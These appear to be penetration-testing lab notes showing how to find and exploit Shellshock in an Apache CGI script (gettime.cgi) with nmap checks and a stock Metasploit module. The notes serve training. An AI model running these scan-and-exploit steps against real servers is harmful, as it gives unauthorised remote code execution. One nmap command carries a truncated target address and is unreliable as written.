Metasploit Exploitation

#Enumeration

nmap -sV 192.173.104.3
80/tcp open  http    Apache httpd 2.4.6 ((Unix))

  • Check the website via a browser:

    • http://192.173.104.3/

  • View Page Source

    • http://192.173.104.3/gettime.cgi

    • gettime.cgi script can be utilized as the attack vector

  • Check if the server is vulnerable to ShellShock

nmap -sV --script=http-shellshock --script-args "http-shellshock.uri=/gettime.cgi" 192.173

#Metasploit

search shellshock
use exploit/multi/http/apache_mod_cgi_bash_env_exec
set RHOSTS ip address
set TARGETURI /gettime.cgi
exploit
PreviousApache-Shellshock(Bash)NextFTP

Last updated